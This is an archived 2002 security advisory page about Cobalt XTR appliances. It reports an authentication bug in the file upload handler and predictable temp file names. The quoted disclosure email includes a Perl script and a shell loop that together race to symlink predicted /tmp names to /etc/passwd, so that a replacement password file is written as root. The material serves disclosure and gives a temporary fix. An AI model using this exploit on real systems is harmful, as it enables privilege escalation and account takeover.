Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Cobalt XTR User Interface Access Control Issue and File Uploading Authentication Bug Let Local Users Write to Files with Root Privileges
|
|
SecurityTracker Alert ID: 1003778 |
|
SecurityTracker URL: http://securitytracker.com/id/1003778
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 11 2002
|
Impact:
Modification of system information, Modification of user information, Root access via local system
|
Exploit Included: Yes
|
|
Description:
A vulnerability was reported in the Cobalt XTR appliance user interface. A local user can write files to the system with root privileges.
It is reported that certain portions of the the Cobalt XTR user interface UI are not password protected (i.e., no .htaccess protection). This allows remote users to access the MultiFileUpload.php function. Due to an authentication bug in MultiFileUploadHandler.php (which handles upload request posted from MultiFileUpload.php), a remote user can cause certain temporary files to be written on the system in the /tmp directory. The function reportedly accepts user-supplied data to specify the upload user identity.
It is also reported that the MultiFileUpload.php file uploading code uses a predicatable Base64 temporary file name based on system time. A local user can create a symbolic link (symlink) from the predictable temporary file name to a critical file on the system (such as /etc/passwd).
A user can exploit both of these conditions to cause arbitrary files to be written with arbitrary privileges. After setting up the symlink, the user can upload the target file (such as a replacement /etc/passwd file) to cause the linked file to be overwritten:
https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php
The vendor has reportedly been notified.
|
Impact:
A local user can write to any file with root privileges.
|
Solution:
No vendor solution was available at the time of this entry.
The author of the report recommends creating a .htaccess file in the uifc directory as a temporary fix.
|
Vendor URL: www.cobalt.com/products/xtr/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 08 Mar 2002 19:32:38 +0100
Subject: Remote Cobalt Raq XTR vulns
|
-----------------------------------------------------------------
Topic : Combined (Remote/Local root) Cobalt XTR vulnerabilities
Date : 02-03-2002
Author : Wouter ter Maat aka grazer@digit-labs.org
Url : http://www.digit-labs.org
-----------------------------------------------------------------
Description : Some areas of the Cobalt XTR UI are not .htaccess protected,
Therefore users can access MultiFileUpload.php
from remote.
MultiFileUploadHandler.php handles upload request
posted from MultiFileUpload.php.
Due to an authentication bug in the upload Handler,
users can write files to the filesystem as any
valid user on the system, including root.
Exploitation : To exploit this vulnerability, you need shell access
(or be creative).
----- snippet of MultiFileUPload.php -----
// get uid
$pwnam = posix_getpwnam($PHP_AUTH_USER);
$uid = $pwnam["uid"];
// get filename
$baseName = base64_encode(time());
$fullName = "/tmp/" . $baseName;
------------------------------------------
As you can see, user information is read to $pwnam, which
is the return value of function posix_getpwnam($PHP_AUTH_USER);
PHP_AUTH_USER can be modified to each desired value (remote)
(i prefer root :P).
The Next problem, lies in the base64 encoding of the filename,
which is predictable. If you can predict the base64 filenames
for example the next ten minutes (time()), and create symbolic
links to /etc/passwd, you will have exactly ten minutes to
exploit the machine.
After the symlinks have been created (script to create base64
symlink is below), you will need to upload your modified
target file (script set to /etc/passwd).
You can upload your file at
https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php
(if you know how forms work, and understand the
authentication error :P).
Quick patch : Create a .htaccess file in the uifc directory.
Vendor status : Sun Cobalt was notified at the day of writing.
-> Explotation and further technical info can be found here:
http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3665
---------------- local-timerace-xtr.pl -----------------
#!/usr/bin/perl
# mass base64 time encoder
# part of Cobalt UIFC XTR remote/local combination attack
use MIME::Base64;
$evil_time = time();
$exploit_secs = 10; # time in seconds you got to exploit this bug (race)
for($i=1;$i<=$exploit_secs; $i++) {
$evil_time = $evil_time+1;
$evilstr = encode_base64($evil_time);
print $evilstr;
}
-------------------------------------------------------
------------------- symlink-time.sh -------------------
#!/bin/sh
#Script for creating symlinks from output of local-timerace-xtr
for foo in `perl -x xtr-timerace-xtr.pl`
do
ln -s /etc/passwd $foo
done
-------------------------------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
